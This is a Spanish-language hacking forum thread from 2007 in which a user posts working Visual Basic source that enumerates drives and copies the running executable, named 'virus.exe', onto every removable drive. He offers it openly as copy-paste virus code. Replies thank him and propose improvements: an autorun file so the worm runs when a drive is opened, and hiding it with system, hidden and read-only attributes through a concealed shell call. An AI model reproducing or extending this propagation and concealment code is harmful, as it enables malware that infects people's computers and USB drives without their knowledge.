[Source] Infectar unidades extraibles (pendrive), unidades de red, etc...

Iniciado por Mad Antrax, 3 Abril 2007, 00:03 AM

0 Miembros y 2 Visitantes están viendo este tema.

Mad Antrax

Este sencillo código permite enumerar todas las unidades del sistema, descubrir de que tipo son (fijas, extraibles, CD, remotas, etc...) y copiar el virus en su interior.

Código (vb) [Seleccionar]
Private Declare Function GetLogicalDrives Lib "kernel32" () As Long
Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long

Const DRIVE_REMOVABLE = 2
Const DRIVE_FIXED = 3
Const DRIVE_REMOTE = 4
Const DRIVE_CDROM = 5
Const DRIVE_RAMDISK = 6

'Función para enumerar todas las unidades (sean del tipo que sean)
Function EnumDrives() As String
    Dim i As Long
    Dim tmp As Long
    Dim drives As String
   
    tmp = GetLogicalDrives()
    If tmp Then
        For i = 0 To 25
            If (tmp And 2 ^ i) <> 0 Then
                drives = drives & Chr$(i + 65) & ":#"
            End If
        Next
    End If
    EnumDrives = drives
    'La variable drives almacena todas
    'las unidades en formato "A:#C:#D:#E:#"
End Function

Function GetType(ByVal drives As String)
    Dim tmp() As String

    'Separamos las unidades según el caracter #
    tmp = Split(drives, "#")
    For i = 0 To UBound(tmp) - 1
        If GetDriveType(tmp(i)) = DRIVE_REMOVABLE Then
            'Llamamos a la función de infectar la unidad
            'si es del tipo DRIVE_REMOVABLE
            Call InfectDrive("virus.exe", tmp(i))
        End If
    Next
End Function

Function InfectDrive(ByVal FileName As String, ByVal drive As String) As Boolean
    'Importante, no siempre tenemos acceso de escritura
    'en las unidades, sin esta linea podríamos "matar"
    'nuestro virus :(
    On Error Resume Next
   
    Dim MySelf As String
    MySelf = String$(255, Chr$(0))

    'Obtenemos nuestra propia ruta
    GetModuleFileName 0, MySelf, Len(MySelf)
    'Nos copiamos en la unidad con el nombre de "virus.exe"
    FileCopy MySelf, drive & "\" & FileName
End Function

Private Sub Form_Load()
    'Empieza la juerga!
    Call GetType(EnumDrives)
End Sub


El código está comentado y no tiene mucha complicación, copiar y pegar en un proyecto nuevo y os funcionará.

Decirme si os gusta, si se puede mejorar algo, añadir funciones, etc...

Saludos!! vuestro amigo ||MadAntrax||
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

Tyrz

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf

~~

Joe ultimamente estas q regalas los codigos xDD gracias (de nuevo) ;)

Mad Antrax

#3
Cita de: E0N en  3 Abril 2007, 00:05 AM
Joe ultimamente estas q regalas los codigos xDD gracias (de nuevo)
Digamos que tengo una época generosa... tengo más códigos para regalar pero los publicaré poquito a poco, tantos de golpe no se asimilan bien

Saludos!!




Se me ocurre una mejora: Hacer que el código cree el archivo autorun.ini con el path apuntando al virus, de esta forma consigues que nuestro EXE se ejecute al hacer doble click en las unidades de red, solo me falta saber si tambien afecta en los otros tipos de unidad.

Proponer algo :P
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

Jareth

Cita de: ||MadAntrax|| en  3 Abril 2007, 00:08 AM

Digamos que tengo una época generosa... tengo más códigos para regalar pero los publicaré poquito a poco, tantos de golpe no se asimilan bien

Saludos!!
Joer pues a seguir publicando codigos,que son muy interesantes y de gran ayuda.Espero con ansias tu siguiente aporte  ;).
Saludos y gracias.

Rudy21

Si Despues de crear el autorun.inf usas shell y lo pones en vbhide y le pones attrib +s +h +r lo pones como archivo oculto yd e sistema aunke vea los ocultos no c ve jejeje


Salu2


Meg

podrias poner un post con todos tus codigos,en ese post se blokea y se le pone chincheta,yo creo k seria lo mejor para tener recopilados todos tus codigos ya que son buenos y utiles... solo es una idea xD que os parece??

Tyrz

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf

Mad Antrax

Cita de: Meg en  3 Abril 2007, 22:33 PM
podrias poner un post con todos tus codigos,en ese post se blokea y se le pone chincheta,yo creo k seria lo mejor para tener recopilados todos tus codigos ya que son buenos y utiles... solo es una idea xD que os parece??
Ummm, no creo que merezca un trato especial para mi sources, prefiero ir abriendo un post para cada source, asi lo podemos comentar y mejorar, si los pongo todos en uno se juntarán todas las dudas/sujerencias/mejoras y será un lío...

Gracias igualmente
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

~~

Si kieres ponerlos en kizar.net yo me encargo de q tenga chincheta, una recopilacion asi siempre es util ;)